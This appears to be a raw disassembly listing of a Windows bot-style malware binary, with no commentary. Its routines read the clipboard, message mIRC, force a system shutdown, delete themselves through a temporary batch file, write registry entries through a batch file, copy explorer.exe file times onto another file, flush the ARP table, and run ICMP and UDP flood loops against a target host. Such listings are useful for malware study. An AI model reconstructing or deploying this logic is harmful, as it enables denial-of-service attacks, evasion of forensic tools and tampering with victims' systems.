loc_40982D: ; CODE XREF: sub_4095A9+256�j
cmp dword_43CB40, esi
jz short loc_409861
push dword_43CB44
lea eax, [ebp+var_200]
push offset aOdbc32_dllFail ; "Odbc32.dll failed. <%d>"
push eax
call sub_415316
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_412BD1
add esp, 20h
loc_409861: ; CODE XREF: sub_4095A9+28A�j
cmp dword_43CB48, esi
jz short loc_409895
push dword_43CB4C
lea eax, [ebp+var_200]
push offset aAvicap32_dllFa ; "Avicap32.dll failed. <%d>"
push eax
call sub_415316
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_412BD1
add esp, 20h
loc_409895: ; CODE XREF: sub_4095A9+2BE�j
lea eax, [ebp+var_200]
push offset dword_429A8C
push eax
call sub_415316
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_4098C2
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_412BD1
add esp, 14h
loc_4098C2: ; CODE XREF: sub_4095A9+302�j
lea eax, [ebp+var_200]
push eax
call sub_40B078
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4095A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4098D4 proc near ; CODE XREF: sub_40CD3A+BEF�p
; sub_40CD3A+C20�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz short loc_40995F
mov eax, [ebp+arg_4]
cmp eax, esi
jz short loc_40995F
cmp [ebp+arg_8], esi
jz short loc_40995F
cmp byte ptr [eax], 0
jz short loc_40995F
push ebx
push edi
call sub_42067A
mov ebx, eax
pop ecx
test ebx, ebx
jz short loc_40995A
push [ebp+arg_4]
push edi
call sub_4158E0
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_409953
sub eax, edi
push eax
push edi
push ebx
call sub_416BE0
push [ebp+arg_8]
mov eax, ebx
sub eax, edi
and byte ptr [eax+esi], 0
call sub_415B10
push eax
push [ebp+arg_8]
push ebx
call sub_416DB0
push [ebp+arg_4]
call sub_415B10
add eax, esi
push eax
push ebx
call sub_415A30
push ebx
push edi
call sub_415A20
add esp, 30h
mov esi, edi
loc_409953: ; CODE XREF: sub_4098D4+3C�j
push ebx
call sub_415C9B
pop ecx
loc_40995A: ; CODE XREF: sub_4098D4+2B�j
mov eax, esi
pop ebx
jmp short loc_409961
; ---------------------------------------------------------------------------
loc_40995F: ; CODE XREF: sub_4098D4+C�j
; sub_4098D4+13�j ...
xor eax, eax
loc_409961: ; CODE XREF: sub_4098D4+89�j
pop edi
pop esi
pop ebp
retn
sub_4098D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409965 proc near ; CODE XREF: sub_40CBBE+E9�p
var_7D0 = dword ptr -7D0h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push edi
xor ebx, ebx
push 7D0h
lea eax, [ebp+var_7D0]
push ebx
push eax
call sub_415390
mov esi, [ebp+arg_0]
push esi
call sub_415B10
xor edi, edi
add esp, 10h
inc edi
cmp eax, edi
jge short loc_40999D
or eax, 0FFFFFFFFh
jmp short loc_409A04
; ---------------------------------------------------------------------------
loc_40999D: ; CODE XREF: sub_409965+31�j
xor ecx, ecx
cmp eax, ebx
mov [ebp+var_7D0], esi
jle short loc_4099BE
loc_4099A9: ; CODE XREF: sub_409965+57�j
mov dl, [ecx+esi]
cmp dl, 0Ah
jz short loc_4099B6
cmp dl, 0Dh
jnz short loc_4099B9
loc_4099B6: ; CODE XREF: sub_409965+4A�j
mov [ecx+esi], bl
loc_4099B9: ; CODE XREF: sub_409965+4F�j
inc ecx
cmp ecx, eax
jl short loc_4099A9
loc_4099BE: ; CODE XREF: sub_409965+42�j
xor edx, edx
cmp eax, ebx
jle short loc_4099E6
loc_4099C4: ; CODE XREF: sub_409965+7F�j
cmp [edx+esi], bl
jnz short loc_4099E1
lea ecx, [edx+esi+1]
cmp [ecx], bl
jz short loc_4099E1
cmp edi, 1F4h
jge short loc_4099E6
mov [ebp+edi*4+var_7D0], ecx
inc edi
loc_4099E1: ; CODE XREF: sub_409965+62�j
; sub_409965+6A�j
inc edx
cmp edx, eax
jl short loc_4099C4
loc_4099E6: ; CODE XREF: sub_409965+5D�j
; sub_409965+72�j
cmp [ebp+arg_4], ebx
jz short loc_409A02
lea eax, [ebp+var_7D0]
push 7D0h
push eax
push [ebp+arg_4]
call sub_4153F0
add esp, 0Ch
loc_409A02: ; CODE XREF: sub_409965+84�j
mov eax, edi
loc_409A04: ; CODE XREF: sub_409965+36�j
pop edi
pop esi
pop ebx
leave
retn
sub_409965 endp
; =============== S U B R O U T I N E =======================================
sub_409A09 proc near ; CODE XREF: sub_409A63+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
xor esi, esi
rep stosd
lea edi, [eax-1]
test edi, edi
jl short loc_409A42
push ebx
mov ebx, edi
loc_409A26: ; CODE XREF: sub_409A09+36�j
mov eax, [esp+0Ch+arg_0]
mov al, [esi+eax]
push eax
call sub_409A45
pop ecx
inc esi
mov ecx, [esp+0Ch+arg_8]
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_409A26
pop ebx
loc_409A42: ; CODE XREF: sub_409A09+18�j
pop edi
pop esi
retn
sub_409A09 endp
; =============== S U B R O U T I N E =======================================
sub_409A45 proc near ; CODE XREF: sub_409A09+25�p
; sub_409A63+69�p
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax
call sub_417033
cmp al, 61h
pop ecx
jl short loc_409A60
cmp al, 7Ah
jg short loc_409A60
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_409A60: ; CODE XREF: sub_409A45+E�j
; sub_409A45+12�j
xor eax, eax
retn
sub_409A45 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409A63 proc near ; CODE XREF: sub_40B158+10�p
; sub_40B18A+A0�p
var_100C = dword ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_415B90
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_415B10
push [ebp+arg_4]
mov [ebp+var_4], eax
call sub_415B10
mov esi, eax
lea eax, [ebp+var_100C]
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_C], esi
call sub_409A09
add esp, 14h
dec esi
mov edi, esi
jmp short loc_409B15
; ---------------------------------------------------------------------------
loc_409AA3: ; CODE XREF: sub_409A63+B4�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [esi+eax]
push eax
call sub_417033
mov ebx, eax
mov eax, [ebp+arg_0]
movsx eax, byte ptr [edi+eax]
push eax
call sub_417033
pop ecx
cmp eax, ebx
pop ecx
jz short loc_409B13
loc_409AC5: ; CODE XREF: sub_409A63+AE�j
mov ebx, [ebp+arg_0]
mov al, [edi+ebx]
push eax
call sub_409A45
mov edx, [ebp+var_C]
mov eax, [ebp+eax*4+var_100C]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_409AE6
mov eax, ecx
loc_409AE6: ; CODE XREF: sub_409A63+7F�j
add edi, eax
cmp edi, [ebp+var_4]
jge short loc_409B23
mov eax, [ebp+arg_4]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax
call sub_417033
movsx ecx, byte ptr [edi+ebx]
push ecx
mov [ebp+var_8], eax
call sub_417033
pop ecx
pop ecx
mov ecx, [ebp+var_8]
cmp eax, ecx
jnz short loc_409AC5
loc_409B13: ; CODE XREF: sub_409A63+60�j
dec edi
dec esi
loc_409B15: ; CODE XREF: sub_409A63+3E�j
test esi, esi
jg short loc_409AA3
mov eax, [ebp+arg_0]
add eax, edi
loc_409B1E: ; CODE XREF: sub_409A63+C2�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_409B23: ; CODE XREF: sub_409A63+88�j
xor eax, eax
jmp short loc_409B1E
sub_409A63 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409B27 proc near ; CODE XREF: sub_40CD3A+3AB4�p
; sub_40CD3A+470A�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push esi
call dword_421088 ; RtlGetLastWin32Error
mov esi, eax
push 0
lea eax, [ebp+var_100]
push 100h
push eax
push 400h
push esi
push 0
push 1200h
call dword_4210CC ; FormatMessageA
lea eax, [ebp+var_100]
loc_409B60: ; CODE XREF: sub_409B27+46�j
mov cl, [eax]
cmp cl, 1Fh
jg short loc_409B6C
cmp cl, 9
jnz short loc_409B6F
loc_409B6C: ; CODE XREF: sub_409B27+3E�j
inc eax
jmp short loc_409B60
; ---------------------------------------------------------------------------
loc_409B6F: ; CODE XREF: sub_409B27+43�j
; sub_409B27+5B�j ...
and byte ptr [eax], 0
dec eax
lea ecx, [ebp+var_100]
cmp eax, ecx
jb short loc_409B89
mov cl, [eax]
cmp cl, 2Eh
jz short loc_409B6F
cmp cl, 21h
jl short loc_409B6F
loc_409B89: ; CODE XREF: sub_409B27+54�j
lea eax, [ebp+var_100]
push esi
push eax
mov esi, offset dword_43CB50
push [ebp+arg_0]
push offset aSErrorSD_ ; "%s Error: %s <%d>."
push 200h
push esi
call sub_41588A
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_409B27 endp
; =============== S U B R O U T I N E =======================================
sub_409BB1 proc near ; CODE XREF: sub_40CD3A+512D�p
push esi
push 0
call dword_43C9F4 ; OpenClipboard
test eax, eax
jz short loc_409BE8
push 1
call dword_43CA14 ; GetClipboardData
mov esi, eax
test esi, esi
jz short loc_409BE8
push edi
push esi
call dword_4210D4 ; GlobalLock
push esi
mov edi, eax
call dword_4210D0 ; GlobalUnlock
call dword_43CA78 ; CloseClipboard
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_409BE8: ; CODE XREF: sub_409BB1+B�j
; sub_409BB1+19�j
xor eax, eax
pop esi
retn
sub_409BB1 endp
; =============== S U B R O U T I N E =======================================
sub_409BEC proc near ; CODE XREF: sub_40CD3A+44B4�p
arg_0 = dword ptr 4
push ebp
push esi
push edi
xor esi, esi
mov edi, offset aMirc ; "mIRC"
push esi
push edi
call dword_43CA30 ; FindWindowA
mov ebp, eax
cmp ebp, esi
jz short loc_409C68
push ebx
push edi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call dword_4210E0 ; CreateFileMappingA
push esi
push esi
mov edi, eax
push esi
push 0F001Fh
push edi
call dword_4210DC ; MapViewOfFile
push [esp+10h+arg_0]
mov ebx, eax
push ebx
call sub_415316
pop ecx
pop ecx
push esi
push 1
push 4C8h
push ebp
call dword_43CA80 ; SendMessageA
push esi
push 1
push 4C9h
push ebp
call dword_43CA80 ; SendMessageA
push ebx
call dword_4210D8 ; UnmapViewOfFile
push edi
call dword_42106C ; CloseHandle
xor eax, eax
pop ebx
inc eax
jmp short loc_409C6A
; ---------------------------------------------------------------------------
loc_409C68: ; CODE XREF: sub_409BEC+16�j
xor eax, eax
loc_409C6A: ; CODE XREF: sub_409BEC+7A�j
pop edi
pop esi
pop ebp
retn
sub_409BEC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C6E proc near ; CODE XREF: sub_40C574+20D�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
xor esi, esi
push edi
lea eax, [ebp+var_11C]
push esi
push eax
push 104h
push esi
push offset aExplorer_exe ; "explorer.exe"
push esi
call dword_43CADC ; SearchPathA
test eax, eax
jz short loc_409D0D
mov edi, 80h
push esi
push edi
push 3
push esi
mov esi, dword_421078
push 1
lea eax, [ebp+var_11C]
push 80000000h
push eax
call esi ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_409D0D
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call dword_4210E8 ; GetFileTime
push ebx
mov ebx, dword_42106C
call ebx ; CloseHandle
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_409D0D
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call dword_4210E4 ; SetFileTime
push esi
call ebx ; CloseHandle
loc_409D0D: ; CODE XREF: sub_409C6E+2A�j
; sub_409C6E+51�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_409C6E endp
; =============== S U B R O U T I N E =======================================
sub_409D12 proc near ; CODE XREF: sub_40CD3A+133C�p
push 1
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
call sub_413BE5
pop ecx
pop ecx
push 50005h
push 6
call dword_43C96C ; ExitWindowsEx
neg eax
sbb eax, eax
neg eax
retn
sub_409D12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409D34 proc near ; CODE XREF: sub_40BBF7+45F�p
; sub_40CD3A+53C9�p
var_764 = byte ptr -764h
var_364 = byte ptr -364h
var_260 = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_14 = byte ptr -14h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push esi
xor esi, esi
cmp dword_42C254, esi
push edi
jz short loc_409D58
cmp dword_43CAF0, esi
jnz short loc_409D58
push esi
call sub_40B2B9
pop ecx
loc_409D58: ; CODE XREF: sub_409D34+13�j
; sub_409D34+1B�j
call sub_414F9D
lea eax, [ebp+var_764]
push eax
push 400h
call dword_4210F8 ; GetTempPathA
lea eax, [ebp+var_764]
push eax
lea eax, [ebp+var_260]
push offset aSdel_bat ; "%sdel.bat"
push eax
call sub_415316
add esp, 0Ch
lea eax, [ebp+var_260]
push esi
push esi
push 2
push esi
push esi
push 40000000h
push eax
call dword_421078 ; CreateFileA
mov edi, eax
cmp edi, esi
jbe loc_409EB8
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax
call sub_415316
add esp, 0Ch
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_764]
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_764]
push eax
push edi
call dword_421070 ; WriteFile
push edi
call dword_42106C ; CloseHandle
push 10h
lea eax, [ebp+var_14]
push esi
push eax
call sub_415390
push 44h
lea eax, [ebp+var_58]
pop edi
push edi
push esi
push eax
call sub_415390
add esp, 18h
mov [ebp+var_58], edi
mov edi, 104h
lea eax, [ebp+var_15C]
push edi
push eax
push esi
mov [ebp+var_4C], offset byte_43B658
mov [ebp+var_2C], 1
mov [ebp+var_28], si
call dword_4210C8 ; GetModuleHandleA
push eax
call dword_42107C ; GetModuleFileNameA
lea eax, [ebp+var_15C]
push eax
call dword_421094 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_409E60
lea eax, [ebp+var_15C]
push 80h
push eax
call dword_4210F4 ; SetFileAttributesA
loc_409E60: ; CODE XREF: sub_409D34+118�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset aComspecCSS ; "%%comspec%% /c %s %s"
push eax
call sub_415316
add esp, 10h
lea eax, [ebp+var_364]
push edi
push eax
lea eax, [ebp+var_764]
push eax
call dword_4210F0 ; ExpandEnvironmentStringsA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push 4008h
push 1
push esi
lea eax, [ebp+var_364]
push esi
push eax
push esi
call dword_4210EC ; CreateProcessA
loc_409EB8: ; CODE XREF: sub_409D34+72�j
pop edi
pop esi
leave
retn
sub_409D34 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409EBC proc near ; CODE XREF: sub_40C574+31�p
var_1860 = byte ptr -1860h
var_158 = byte ptr -158h
var_58 = byte ptr -58h
var_48 = dword ptr -48h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_4 = byte ptr -4
push ebp
mov ebp, esp
mov eax, 1860h
call sub_415B90
push esi
push edi
mov ecx, 5C1h
mov esi, offset a@echoOffEchoRe ; "@echo off\r\nEcho REGEDIT4>%temp%\\1.reg\r\n"...
lea edi, [ebp+var_1860]
lea eax, [ebp+var_158]
rep movsd
movsw
push offset aCA_bat ; "c:\\a.bat"
push eax
movsb
call sub_415316
pop ecx
xor esi, esi
pop ecx
lea eax, [ebp+var_158]
push esi
push esi
push 2
push esi
push esi
push 40000000h
push eax
call dword_421078 ; CreateFileA
mov edi, eax
cmp edi, esi
jbe short loc_409F76
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_1860]
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_1860]
push eax
push edi
call dword_421070 ; WriteFile
push edi
call dword_42106C ; CloseHandle
push 44h
lea eax, [ebp+var_48]
pop edi
push edi
push esi
push eax
call sub_415390
add esp, 0Ch
lea ecx, [ebp+var_58]
xor eax, eax
mov [ebp+var_48], edi
push ecx
lea ecx, [ebp+var_48]
push ecx
push esi
inc eax
push esi
push 28h
mov [ebp+var_1C], eax
push eax
push esi
lea eax, [ebp+var_158]
push esi
push eax
push esi
mov [ebp+var_18], si
call dword_4210EC ; CreateProcessA
loc_409F76: ; CODE XREF: sub_409EBC+55�j
pop edi
pop esi
leave
retn
sub_409EBC endp
; =============== S U B R O U T I N E =======================================
sub_409F7A proc near ; CODE XREF: sub_4013E8+7�p
; sub_401B7C+7�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_43CA64 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_409FA2
push [esp+arg_0]
call dword_43CAA8 ; gethostbyname
test eax, eax
jnz short loc_409F9B
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_409F9B: ; CODE XREF: sub_409F7A+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_409FA2: ; CODE XREF: sub_409F7A+D�j
retn
sub_409F7A endp
; =============== S U B R O U T I N E =======================================
sub_409FA3 proc near ; CODE XREF: sub_40CA58+D6�p
mov ecx, dword_43C94C
xor eax, eax
test ecx, ecx
jz short locret_409FB1
jmp ecx
; ---------------------------------------------------------------------------
locret_409FB1: ; CODE XREF: sub_409FA3+A�j
retn
sub_409FA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409FB2 proc near ; CODE XREF: sub_40CD3A:loc_411E19�p
var_88 = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 88h
push ebx
xor ebx, ebx
push esi
inc ebx
push edi
lea eax, [ebp+var_8]
xor edi, edi
push ebx
push eax
push edi
xor esi, esi
mov [ebp+var_8], edi
mov [ebp+var_4], ebx
call dword_43CAA0 ; GetIpNetTable
mov ecx, eax
sub ecx, edi
jz short loc_40A039
sub ecx, 32h
jz loc_40A083
sub ecx, 48h
jz short loc_40A00E
sub ecx, 6Eh
jz short loc_40A007
loc_409FF0: ; CODE XREF: sub_409FB2+85�j
push eax
lea eax, [ebp+var_88]
push offset unk_42B4B8
push eax
call sub_415316
add esp, 0Ch
jmp short loc_40A064
; ---------------------------------------------------------------------------
loc_40A007: ; CODE XREF: sub_409FB2+3C�j
push offset unk_42B47C
jmp short loc_40A056
; ---------------------------------------------------------------------------
loc_40A00E: ; CODE XREF: sub_409FB2+37�j
push [ebp+var_8]
call sub_415BE9
push [ebp+var_8]
mov esi, eax
push edi
push esi
call sub_415390
add esp, 10h
cmp esi, edi
jz short loc_40A051
lea eax, [ebp+var_8]
push ebx
push eax
push esi
call dword_43CAA0 ; GetIpNetTable
cmp eax, edi
jnz short loc_409FF0
loc_40A039: ; CODE XREF: sub_409FB2+29�j
cmp [esi], edi
jbe short loc_40A074
lea ebx, [esi+4]
loc_40A040: ; CODE XREF: sub_409FB2+9B�j
push ebx
call dword_43CA9C ; DeleteIpNetEntry
inc edi
add ebx, 18h
cmp edi, [esi]
jb short loc_40A040
jmp short loc_40A074
; ---------------------------------------------------------------------------
loc_40A051: ; CODE XREF: sub_409FB2+75�j
push offset unk_42B438
loc_40A056: ; CODE XREF: sub_409FB2+5A�j
; sub_409FB2+D6�j
lea eax, [ebp+var_88]
push eax
call sub_415316
pop ecx
pop ecx
loc_40A064: ; CODE XREF: sub_409FB2+53�j
lea eax, [ebp+var_88]
mov [ebp+var_4], edi
push eax
call sub_40B078
pop ecx
loc_40A074: ; CODE XREF: sub_409FB2+89�j
; sub_409FB2+9D�j
push esi
call sub_415C9B
mov eax, [ebp+var_4]
pop ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40A083: ; CODE XREF: sub_409FB2+2E�j
push offset unk_42B3F0
jmp short loc_40A056
sub_409FB2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A08A proc near ; CODE XREF: sub_401444+231�p
; sub_401BD4+253�p ...
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push 10h
pop eax
mov [ebp+var_4], eax
push eax
lea eax, [ebp+var_14]
push 0
push eax
call sub_415390
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
call dword_43C9C8 ; getsockname
movzx eax, [ebp+var_D]
push eax
mov esi, offset dword_43CD50
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push esi
call sub_415316
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_40A08A endp
; =============== S U B R O U T I N E =======================================
sub_40A0E3 proc near ; CODE XREF: sub_4010B2+24C�p
; sub_4010B2+292�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
xor edx, edx
cmp ecx, 1
push esi
jle short loc_40A10E
lea eax, [ecx-2]
push edi
shr eax, 1
inc eax
mov esi, eax
neg esi
lea ecx, [ecx+esi*2]
mov esi, [esp+8+arg_0]
loc_40A101: ; CODE XREF: sub_40A0E3+26�j
movzx edi, word ptr [esi]
add edx, edi
inc esi
inc esi
dec eax
jnz short loc_40A101
pop edi
jmp short loc_40A112
; ---------------------------------------------------------------------------
loc_40A10E: ; CODE XREF: sub_40A0E3+A�j
mov esi, [esp+4+arg_0]
loc_40A112: ; CODE XREF: sub_40A0E3+29�j
test ecx, ecx
jz short loc_40A11B
movzx eax, byte ptr [esi]
add edx, eax
loc_40A11B: ; CODE XREF: sub_40A0E3+31�j
mov ecx, edx
and edx, 0FFFFh
shr ecx, 10h
add ecx, edx
pop esi
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
retn
sub_40A0E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A133 proc near ; DATA XREF: sub_40CD3A+2CA8�o
var_10320 = byte ptr -10320h
var_344 = byte ptr -344h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10320h
call sub_415B90
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
xor edi, edi
inc edi
mov [eax+120h], edi
call dword_43C9B0 ; IcmpCreateFile
mov [ebp+arg_0], eax
lea eax, [ebp+var_C0]
push eax
call dword_43CA64 ; inet_addr
mov esi, eax
xor ebx, ebx
xor eax, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40A18E
lea eax, [ebp+var_C0]
push eax
call dword_43CAA8 ; gethostbyname
cmp eax, ebx
jz short loc_40A194
loc_40A18E: ; CODE XREF: sub_40A133+48�j
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_40A1F1
loc_40A194: ; CODE XREF: sub_40A133+59�j
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset unk_42B53C
push eax
call sub_415316
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_40A1D4
push ebx
lea eax, [ebp+var_344]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_412BD1
add esp, 14h
loc_40A1D4: ; CODE XREF: sub_40A133+7F�j
lea eax, [ebp+var_344]
push eax
call sub_40B078
push [ebp+var_30]
call sub_4150F0
pop ecx
pop ecx
push edi
call dword_421048 ; ExitThread
loc_40A1F1: ; CODE XREF: sub_40A133+5F�j
cmp eax, ebx
jz short loc_40A201
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4], eax
jmp short loc_40A204
; ---------------------------------------------------------------------------
loc_40A201: ; CODE XREF: sub_40A133+C0�j
mov [ebp+var_4], esi
loc_40A204: ; CODE XREF: sub_40A133+CC�j
push 1Ch
lea eax, [ebp+var_20]
push ebx
push eax
call sub_415390
or [ebp+var_18], 0FFFFFFFFh
mov eax, 0FFDCh
add esp, 0Ch
cmp [ebp+var_3C], eax
jle short loc_40A224
mov [ebp+var_3C], eax
loc_40A224: ; CODE XREF: sub_40A133+EC�j
cmp [ebp+var_38], edi
jge short loc_40A22C
mov [ebp+var_38], edi
loc_40A22C: ; CODE XREF: sub_40A133+F4�j
xor esi, esi
cmp [ebp+var_40], ebx
jle short loc_40A259
loc_40A233: ; CODE XREF: sub_40A133+124�j
push [ebp+var_38]
lea eax, [ebp+var_20]
push 1Ch
push eax
push ebx
lea eax, [ebp+var_10320]
push [ebp+var_3C]
push eax
push [ebp+var_4]
push [ebp+arg_0]
call dword_43C948 ; IcmpSendEcho
inc esi
cmp esi, [ebp+var_40]
jl short loc_40A233
loc_40A259: ; CODE XREF: sub_40A133+FE�j
push [ebp+arg_0]
call dword_43CAD8 ; IcmpCloseHandle
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset unk_42B4FC
push eax
call sub_415316
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_40A2A2
push ebx
lea eax, [ebp+var_344]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_412BD1
add esp, 14h
loc_40A2A2: ; CODE XREF: sub_40A133+14D�j
lea eax, [ebp+var_344]
push eax
call sub_40B078
push [ebp+var_30]
call sub_4150F0
pop ecx
pop ecx
push ebx
call dword_421048 ; ExitThread
sub_40A133 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A2BF proc near ; DATA XREF: sub_40CD3A+2DE2�o
var_10312 = byte ptr -10312h
var_10310 = byte ptr -10310h
var_334 = byte ptr -334h
var_134 = dword ptr -134h
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10310h
call sub_415B90
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_134]
rep movsd
xor esi, esi
inc esi
mov [eax+120h], esi
call dword_42104C ; GetTickCount
push eax
call sub_415368
pop ecx
push 11h
push 2
push 2
call dword_43CAA4 ; socket
mov ebx, eax
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_415390
add esp, 0Ch
lea eax, [ebp+var_B0]
mov [ebp+var_10], 2
push eax
call dword_43CA64 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_40A3A4
lea eax, [ebp+var_B0]
push eax
call dword_43CAA8 ; gethostbyname
cmp eax, edi
jnz short loc_40A39D
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_334]
push offset dword_42B5B8
push eax
call sub_415316
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_40A380
push edi
lea eax, [ebp+var_334]
push [ebp+var_1C]
push eax
lea eax, [ebp+var_130]
push eax
push [ebp+var_134]
call sub_412BD1
add esp, 14h
loc_40A380: ; CODE XREF: sub_40A2BF+9F�j
lea eax, [ebp+var_334]
push eax
call sub_40B078
push [ebp+var_20]
call sub_4150F0
pop ecx
pop ecx
push esi
call dword_421048 ; ExitThread
